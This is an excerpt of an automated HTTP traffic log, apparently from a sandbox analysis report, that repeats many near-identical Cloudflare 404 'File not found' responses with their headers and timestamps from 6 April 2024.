                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NXvxEsoq2uHiFTG6y0KzIfAQ4PaiUOF%2B2l8XKYyuFbQMOcpj6cVSr9iV7YMEsyMLc%2F0C%2FfrIJLlSI%2Fsi%2FAoNjqWFlxl75VKaowJr1SiAFazauaXI95pEeREKKO4D7WLEdg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011bbe9f78dac-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdVSgMhGj1pcUmIxcBj7mZL3m0UDsubMCJrwQCdbs1FVrot6kbiKluvGLmQ5pu%2FHi%2FXQoEqyUDwNUeGox%2FM62WTJmLAanTtEGT0G9%2B5WMyt9FmB0wDX%2F9l5jQ380na%2Fbbw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011c0d928a558-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GKgDapP8JSaXx2iTlrukWhm5OwI4gu1NXTdiDzxtla4B3YSuaO9FRU0F20FZcCb4DdOOWWCGQTgPgZbBUZ%2FPjUsBfzcQCIzCjXahAvSSmRFjOL9rFeca84vMTE7Mr7GHoQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011c598f7da8b-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecJkXhLfYbCmlHR9zhHpRGgH%2BmTMGQY2MLHJCHbz9BtssggRKnPCcBRmxGrLO0MM26vcuQe%2BU0dWq%2Bi%2FX707b5GFvH41vA88g%2FLU%2FTA%2B1ACmm4HkCRHDYth%2FBtgjnLxVsA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011ca8d2c8dfc-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etE5AqzPg%2Fp5BABSnOixLhQiwNwr2ja0Le0zwg9pn%2FqX0Ph2oZqf4QKq1Yg6H9tWWhcdeqw1sKqVPEsb09rSnORZexbOONhKYw2%2FLUyu85l8oT39aNMBqs4qidDdI6IzzQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011cf59379acf-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J8Ed%2BESZbfYAjg69WiYZEBDfBoTC5GDJLF03VgoYYCxw1dPS6SzLKmKbGOOl2WFflba0va0h56L3ARj7Vmfzu7AUur0uvOjPX5sBbBf5L4FRfDrZpVzubWFHxR0uO6lbmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011d43dd174aa-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D6P5tZWVzpJLz43XaJ%2Fv6b4z5LLormL6XLUnEzmrHipGj74SRxfkpjc3R2jlTsrligntW8tCIC4gK3IlPl2MY2q43b0LMO%2BjRRRd%2B9G%2B%2FeZNxznLnwnAtvWdxsA4se3%2Bhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011d91a53a554-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5pkg7WqhsY%2FngyicWhfUGEywdw2q%2BFpwksbpMVdSuvVL3yPSCt0CO7Dxw6v2E6m7uCCwRV6oZX4CjsCDD6U3%2Bdycutv0PHDzZasq8FEmFMVbvXVYGf%2F1aAQgYr4BDWBF4Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011ddefb9748d-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LbGcZepgXDQMYEqteHeCKgkBkGe%2F2fcb3CnlbQWgQijbG7ZnbWL2uNl6jw4gMagSJ%2BNn4QJca%2BW5KDWQPOdGqiimrqSUrZkdTBPbUmR6u1TuIP3n2zzGMejhBrgIbx%2B5Wg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011e2bcc82589-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:29:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KQWLx8XDMfgQu0WQ1%2B%2Ft7t1FZZ%2FnSWKuP150IEVE1w3ysz14GeDEkMTjHj6CZMNztYJzFuUHTxBNs2ZgWSWSQohtXtNRH0JOFySOy1Nr%2FEoB11w3vlwzkoT7fDhkvTOeJw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011e7a8b25c7c-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4gVvu92rPAxY7UifkgQdDlNaXwDRTDHUU%2BmP36BAQetUgps8cw3Fp9ss1zpkWLx3KYBm%2Fk4R%2F77nFGYdH97uCSU3OBcDoiQbfDDjee8NY2SpBHTzQzJIK2cKu0%2BA6dHVZA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011ec7cfb8dc6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IahZIT4tvxvSLBo5fYqX4ZrCe3sCvTJi%2BY9%2Fi4ArsbwyMaklD3hCfSWqIO1MRYOcjShP2z%2FnOxSUSQn14mD%2FXP7i%2BxCAT8bolqvOr7HmAxuVJF0TjWdfTITENZ7kw3WH4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011f179fb8da8-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AT3YPz6o6szhrf6atFOql9n4tWCLpQKz%2FuAazdDJXFBB4SqHdiDx%2BXoB%2Bl1UzJAdGj9ocpfL5vlEpEn7BgycrrG0nNLi4w7bHmM1Dunn069793GQ%2FalOYh6%2BkZqoEgEo6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011f66ad8a54e-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A6YOvhgdIT6Z2jf9fyoYXsEO778yKErcrSlsXext1rBY%2FC7Yg8YyWdv7vb8356uxWLjksPiHmeWg3HIRuqlAqrQBNL3xCjNU22LHLNV6G%2FsSLTfx59M1XwmVNKg%2FREhIMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011fb38f1747f-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32FYP0NzF%2BSRTmsxJ9ZcUXuF4uIGAblzg4OwZ85L6Foz1lHYScaGbhEMDue3m2tuswaYlVocp0vSltcjMLSln1k7jK2eHuCxvbKYEOsqN21dPl9JDxMYyT8lD0SmM9L8YQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870011fffa3ea524-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnbBAHyLkNOa5aqaydUam3%2FqYL0RVYkIE%2FT%2FZ0HaPYUW40HU%2BVe714USuW2KmOxUR9lDD6xMkWn2z4%2BdZR51G%2FRyH72EcElJYtI7%2FiTT9nZffFNmQzDLg0fgMzZz6UX7ZQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001204ed882888-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L615XcJZzDjYWsDyeEgRwPSvL6Y%2BbVMflTcRRU55lDMYRlGtceuRXOyPNKwqBoq1ABo6ysrPk%2FhkOevMZQepszfbz%2BD%2FCPJnufiUbDCuzzUjy341%2BYDOACi8N8rIVJ%2BDFg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001209ac917439-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:05 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lYUfNWE9jn77%2FHjF8X385rySiz22PqC%2B72Je0N5%2Bh6MIFlNgB3xuG2cY2fpFicqrlnVyp5o08nOuUVBwlzhROfeDeFMZYqUDjEEgLLdvxi5xZYMA%2B4xct1nP2ZHTvvjXHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700120e6d3c129b-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NimoAg5%2FXiHvIjDn36mo3FbjFSaCQZylxerow2D5WawNSqHV7aZGE%2BCax38sidzkjrJIHIt6KjSzLr1nw4pC8XSqIdASTD%2BodHDg1hM%2Bm5BTQS35XeY0wHpHCVjiSEe5Ig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012133c096daa-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HuBs%2BMAjusuFC9hlOM%2FgdevH1WY7J6eKDwKg%2Fr2VOcnLZFXqjQWjnwMpGYtoeCkYbHfrI6Ixp%2Bfs4X6VGbKni%2BmBpbacA8q9Wj4XVC94rLep8DtiTE0n91WKBRYeChyswQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012188ee331dd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2sCxI5p9GUnTa7ie2%2FFTUAgDnK5qhWBtsKRKsw040rsUoCMIptGdjfRVSeTRxy78sWigCOzaTAZMaMftGRWKhSmLRTMqjsuGqZCx9eeIZ61PEogv%2FeOksjNnvdnrrW8RYA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700122689be5c6a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AOQjZT72Pgr7tI4uRS3BFLOwEu%2FeI5%2Bzid0AXoCaoSvWNkweeNCTYDPl1IXDe%2FqJlHDBK2ZrFQvZC2g1GJrH%2FIX9vVxZlHzCMVUsO3ZPssSO8gGFIeNRkJ8Q5wFJ%2FSTLhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700122b68d331d7-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWOb5u%2FtWkgAotx%2F0Xnp9PKkOXFlDwfDZhkLBy8R8E7hHrMunwr%2F3CPdwdEcgHnvZphyECKCx4bNcIAqhHYjH2pgU%2FSxwplYKYF4Jd%2BfbxLgyKvBJspwLsDmkRi%2F%2BZDjWw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700123038cd8758-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mytn67HKjgDtNSnsaZOdNxbAUD%2FU5TFPPqbO3EcBztzTVx6ENviHDwUw8O5MHOO%2FYw2F0d7dqa8%2F0bVWWh2CmKq8GyGn2ykc3itT0NkElCAn620jVM8xzhAbdGICIvW2Lw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012351d1d5c63-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A8Z%2Bjw9qnFhRS5obRmBFjKkAROo3NIH35VEDQmwujDqmgFnsx8H2DUaYEYw8p5HCyFygpRnQFd3%2BQHcl8741itJtbB3lxiLhgAwMHtbPzoiI1yz%2FY6dzbdxD3NpXnZRT0g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001239fe0f0a1a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfweIPOFJwhX9ErS8cZ1UEfcKRp7YDs9K%2BoWEaRUHfCQxx%2BzcayEHeEy9WKZKrgoRQQV1y0AaTc5yg7uaTjCpljdl8B0I57gmTrDL6NsFsXCdNhIAjkLzEkPzxOPPjTPkA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700123eca7325be-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LZYuTJcuhe0PhyTk8GdhASc8gDIQ%2F8c3%2Bk3w4cwhroM2oIPxwE7%2BGbY00I8e3%2B2Kg7TpTYkr6GtInb%2F3%2F60OOC2BuEm0pCj1w84dSpkSu1ecpDhuRYgsGj7%2Fl%2BizFI%2B7tA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87001243b88c2248-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEzP9xn%2FY5kau4iQsTH9PXGrlSAw0f5WCdPdPmulAqU0c4TWV16AA5ubpMqdFN5zvLmyaJDzLWM979U715FzdfaCCFAK%2B5ky%2BfqCsLQaSSA501yhiwz5NAj1ANa5GedmtQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012488ab1a4d3-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjJwvUElWxyjGKnq9Ky7wxyXMg4u0mTfawc9Ijcwhe1yUpqml2v4t6UhDZRYiMmmzcVNOxS%2Bdqa0rofL%2BoQh4Sf32zWlcdijIIK4kOpADoG4RD6%2FnCBcZS%2BqfRkHGNGjAw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700124d6e7fda83-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qt2v6rNNDN8wBhQ0T2ngmJkpzLosI%2FXQqh764gGYFihJO3JuK0r02n2zcAxP4ZiI0J3kmyB5zk2T5onYagRMIHiqMrkXDbkyroao3IkFFQbvR2H5megjvCwHEhvzUfm1SQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012524cdadaa9-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vXjH8gyu5sI8sEgmqqtxSdOWJfNVKN5SYhlpaGnGJt5owLwqNz5ihp8FWgan%2B33%2BL%2FCW5U98lw3wFv2PULXiq8ye%2B58n55475GtLAfKDYhfkNh1ud8GsftXErjjfX1YDlQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 870012595dc3dafd-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 06 Apr 2024 07:30:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jUGBHPQqTTJ%2F0%2F9RMPq8nmRQ77oDv7x9sXz8kqY11%2Ba24Wl96Av9ws2EeE0S7QuRH9ZkPEMTN3xklDRsYHu5mSErNHPJR4SfMN2CcWjocs%2BoOgQpuJZJLU1ObwwqabjETA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8700125e3f9b9aef-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
